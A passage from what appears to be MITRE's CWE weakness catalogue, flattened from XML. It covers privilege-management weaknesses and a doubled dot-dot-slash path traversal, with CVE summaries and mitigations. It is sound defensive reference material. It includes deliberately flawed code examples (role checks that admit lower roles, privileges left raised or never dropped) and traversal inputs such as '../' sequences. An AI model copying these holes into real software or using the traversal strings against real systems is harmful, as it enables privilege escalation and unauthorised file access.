Bypass domain restrictions using a particular file that references unsafe URI schemes (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380 - - - CVE-2002-1154 - Script does not restrict access to an update command, leading to resultant disk consumption and filled error logs (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1154 - - - CVE-2002-1145 - "public" database user can use stored procedure to modify data controlled by the database owner (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1145 - - - CVE-2000-0506 - User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0506 - - - CVE-2002-2042 - Allows attachment to and modification of privileged processes (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2042 - - - CVE-2000-1212 - User with privilege can edit raw underlying object using unprotected method (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1212 - - - CVE-2005-1742 - Inappropriate actions allowed by a particular role(Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1742 - - - CVE-2001-1480 - Untrusted entity allowed to access the system clipboard (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1480 - - - CVE-2001-1551 - Extra Linux capability allows bypass of system-specified restriction (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1551 - - - CVE-2001-1166 - User with debugging rights can read entire process (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1166 - - - CVE-2005-1816 - Non-root admins can add themselves or others to the root admin group (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1816 - - - CVE-2005-2173 - Users can change certain properties of objects to perform otherwise unauthorized actions (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2173 - - - CVE-2005-2027 - Certain debugging commands not restricted to just the administrator, allowing registry modification and infoleak (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2027 - - - - - Unsafe Privilege - - - - - - - - - - - - - - - Note: there are 2 separate sub-categories here: - - - privilege incorrectly allows entities to perform certain actions - - object is incorrectly accessible to entities with a given privilege - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - Unsafe Privilege - - - - Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination. - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - High - - - Access Control - Gain Privileges or Assume Identity - A user can be given or gain access rights of another user. This can give the user unauthorized access to sensitive information including the access information of another user. - - - - - Architecture and Design - Separation of Privilege - Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - - - This code allows someone with the role of "ADMIN" or "OPERATOR" to reset a user's password. The role of "OPERATOR" is intended to have less privileges than an "ADMIN", but still be able to help users with small issues such as forgotten passwords. - - public enum Roles {ADMIN,OPERATOR,USER,GUEST} - public void resetPassword(User requestingUser, User user, String password ){ - if(isAuthenticated(requestingUser)){ - switch(requestingUser.role){ - case GUEST:System.out.println("You are not authorized to perform this command");break; - case USER:System.out.println("You are not authorized to perform this command");break; - default:setPassword(user,password);break;} - } - - else{System.out.println("You must be logged in to perform this command");} - } - - This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account. - - - - - CVE-2005-1736 - Chaining of user rights. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1736 - - - CVE-2002-1772 - Gain certain rights via privilege chaining in alternate channel. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1772 - - - CVE-2005-1973 - Application is allowed to assign extra permissions to itself. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1973 - - - CVE-2003-0640 - "operator" user can overwrite usernames and passwords to gain admin privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0640 - - - - - Privilege Chaining - - - - - - - There is some conceptual overlap with Unsafe Privilege. - It is difficult to find good examples for this weakness. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes, Potential_Mitigations, Research_Gaps - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples - - - - - The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - Medium - - - Access Control - Gain Privileges or Assume Identity - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Separation of Privilege - Follow the principle of least privilege when assigning access rights to entities in a software system. - - - Architecture and Design - Separation of Privilege - Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. - - - - - This code temporarily raises the program's privileges to allow creation of a new user folder. - - def makeNewUserDir(username): - if invalidUsername(username): - - - #avoid CWE-22 and CWE-78 - print('Usernames cannot contain invalid characters')return False - - try:raisePrivileges()os.mkdir('/home/' + username)lowerPrivileges() - except OSError:print('Unable to create new user directory for user:' + username)return False - return True - - - - While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur. - - - The following example demonstrates the weakness. - - seteuid(0); - /* do some stuff */ - - seteuid(getuid()); - - - - The following example demonstrates the weakness. - - AccessController.doPrivileged(new PrivilegedAction() { - public Object run() { - // privileged code goes here, for example: - System.loadLibrary("awt");return null; - // nothing to return - - } - - - - - - This code intends to allow only Administrators to print debug information about a system. - - public enum Roles {ADMIN,USER,GUEST} - public void printDebugInfo(User requestingUser){ - if(isAuthenticated(requestingUser)){ - switch(requestingUser.role){ - case GUEST:System.out.println("You are not authorized to perform this command");break; - default:System.out.println(currentDebugState());break; - - } - }else{System.out.println("You must be logged in to perform this command");} - } - - While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of "GUEST". Someone with the role of "ADMIN" or "USER" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system. - - - This code allows someone with the role of "ADMIN" or "OPERATOR" to reset a user's password. The role of "OPERATOR" is intended to have less privileges than an "ADMIN", but still be able to help users with small issues such as forgotten passwords. - - public enum Roles {ADMIN,OPERATOR,USER,GUEST} - public void resetPassword(User requestingUser, User user, String password ){ - if(isAuthenticated(requestingUser)){ - switch(requestingUser.role){ - case GUEST:System.out.println("You are not authorized to perform this command");break; - case USER:System.out.println("You are not authorized to perform this command");break; - default:setPassword(user,password);break;} - } - - else{System.out.println("You must be logged in to perform this command");} - } - - This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account. - - - - - CVE-2001-1555 - Terminal privileges are not reset when a user logs out. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1555 - - - CVE-2001-1514 - Does not properly pass security context to child processes in certain cases, allows privilege escalation. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1514 - - - CVE-2001-0128 - Does not properly compute roles. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0128 - - - CVE-1999-1193 - untrusted user placed in unix "wheel" group - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193 - - - CVE-2005-2741 - Product allows users to grant themselves certain rights that can be used to escalate privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2741 - - - CVE-2005-2496 - Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2496 - - - CVE-2004-0274 - Product mistakenly assigns a particular status to an entity, leading to increased privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0274 - - - CVE-2007-4217 - FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217 - - - CVE-2007-5159 - OS incorrectly installs a program with setuid privileges, allowing users to gain privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5159 - - - CVE-2008-4638 - Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638 - - - CVE-2007-3931 - Installation script installs some programs as setuid when they shouldn't be. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3931 - - - CVE-2002-1981 - Roles have access to dangerous procedures (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1981 - - - CVE-2002-1671 - Untrusted object/method gets access to clipboard (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1671 - - - CVE-2000-0315 - Traceroute program allows unprivileged users to modify source address of packet (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0315 - - - CVE-2000-0506 - User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0506 - - - - - Privilege Management Error - - - - - - - - - - - - - The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Team - 2008-09-08 - Moved this entry higher up in the Research view. - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Type - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Privilege Management Error - Insecure Privilege Management - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize multiple internal "../" sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The 'directory/../../filename' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only removes one "../" sequence, so multiple "../" can bypass that check. Alternately, this manipulation could be used to bypass a check for "../" at the beginning of the pathname, moving up more than one directory level. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-0298 - Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several "/../" sequences, or several "../" in a URI. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0298 - - - - - 'directory/../../filename - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Directory Doubled Dot Dot Slash - 'directory/../../filename' - - - - The software does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Access Control - Gain Privileges or Assume Identity - A user can assume the identity of another user with separate privileges in another context. This will give the user unauthorized access that may allow them to acquire the access information of other users. - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Separation of Privilege - Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. - - - - - CVE-2002-1688 - Web browser cross domain problem when user hits "back" button. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1688 - - - CVE-2003-1026 - Web browser cross domain problem when user hits "back" button. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1026 - - - CVE-2002-1770 - Cross-domain issue - third party product passes code to web browser, which executes it in unsafe zone. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1770 - - - CVE-2005-2263 - Run callback in different security context after it has been changed from untrusted to trusted. * note that "context switch before actions are completed" is one type of problem that happens frequently, espec. in browsers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2263 - - - - - Privilege Context Switching Error - - - - - - - - - - - - - - This concept needs more study. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software does not drop privileges before passing control of a resource to an actor that does not have those privileges. - In some contexts, a system executing with elevated permissions will hand off a process/file/etc. to another process or user. If the privileges of an entity are not reduced, then elevated privileges are spread throughout a system and possibly to an attacker. - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - High - - - Access Control - Gain Privileges or Assume Identity - If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped. - - - Access Control - Non-Repudiation - Gain Privileges or Assume Identity - Hide Activities - If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator. - - - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Separation of Privilege - Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. - - - - - The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file. - - chroot(APP_HOME);chdir("/");FILE* data = fopen(argv[1], "r+");... - - Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced. - - - - - CVE-2000-1213 - Program does not drop privileges after acquiring the raw socket. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1213 - - - CVE-2001-0559 - Setuid program does not drop privileges after a parsing error occurs, then calls another program to handle the error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0559 - - - CVE-2001-0787 - Does not drop privileges in related groups when lowering privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0787 - - - CVE-2002-0080 - Does not drop privileges in related groups when lowering privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0080 - - - CVE-2001-1029 - Does not drop privileges before determining access to certain files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1029 - - - CVE-1999-0813 - Finger daemon does not drop privileges when executing programs on behalf of the user being fingered. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0813 - - - CVE-1999-1326 - FTP server does not drop privileges if a connection is aborted during file transfer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1326 - - - CVE-2000-0172 - Program only uses seteuid to drop privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0172 - - - CVE-2004-2504 - Windows program running as SYSTEM does not drop privileges before executing other programs (many others like this, especially involving the Help facility). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2504 - - - CVE-2004-0213 - Utility Manager launches winhlp32.exe while running with raised privileges, which allows local users to gain system privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213 - - - CVE-2004-0806 - Setuid program does not drop privileges before executing program specified in an environment variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0806 - - - CVE-2004-0828 - Setuid program does not drop privileges before processing file specified on command line. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0828 - - - CVE-2004-2070 - Service on Windows does not drop privileges before using "view file" option, allowing code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2070 - - - - - Privilege Dropping / Lowering Errors - - - - - - - - CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - - - The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed. - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Access Control - Confidentiality - Gain Privileges or Assume Identity - Read Application Data - Read Files or Directories - An attacker may be able to access resources with the elevated privilege that could not be accessed with the attacker's original privileges. This is particularly likely in conjunction with another flaw, such as a buffer overflow. - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Compare binary / bytecode to application permission manifest - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Permission Manifest Analysis - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Separation of Privilege - Follow the principle of least privilege when assigning access rights to entities in a software system. - - - Architecture and Design - Separation of Privilege - - Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. - Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. - - - - - - The following example demonstrates the weakness. - - setuid(0); - // Do some important stuff - setuid(old_uid); - // Do some non privileged stuff. - - - - - - The following example demonstrates the weakness. - - AccessController.doPrivileged(new PrivilegedAction() { - public Object run() { - // privileged code goes here, for example: - System.loadLibrary("awt");return null; - // nothing to return - - } - - - - - - The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file. - - chroot(APP_HOME);chdir("/");FILE* data = fopen(argv[1], "r+");... - - Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced. - - - - - Least Privilege Violation - - - Failure to drop privileges when reasonable - - - POS02-C - Follow the principle of least privilege - - - SEC00-J - Do not allow privileged blocks to leak sensitive information across a trust boundary - - - SEC01-J - Do not allow tainted variables in privileged blocks - - - SFP36 - Privilege - - - - - - - - - - - - CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. - - If system privileges are not dropped when it is reasonable to do so, this is not a vulnerability by itself. According to the principle of least privilege, access should be allowed only when it is absolutely necessary to the function of a given system, and only for the minimal necessary amount of time. Any further allowance of privilege widens the window of time during which a successful exploitation of the system will provide an attacker with that same privilege. If at all possible, limit the allowance of system privilege to small, simple sections of code that may be called atomically. - When a program calls a privileged function, such as chroot(), it must first acquire root privilege. As soon as the privileged operation has completed, the program should drop root privilege and return to the privilege level of the invoking user. - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Detection_Factors, References, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software attempts 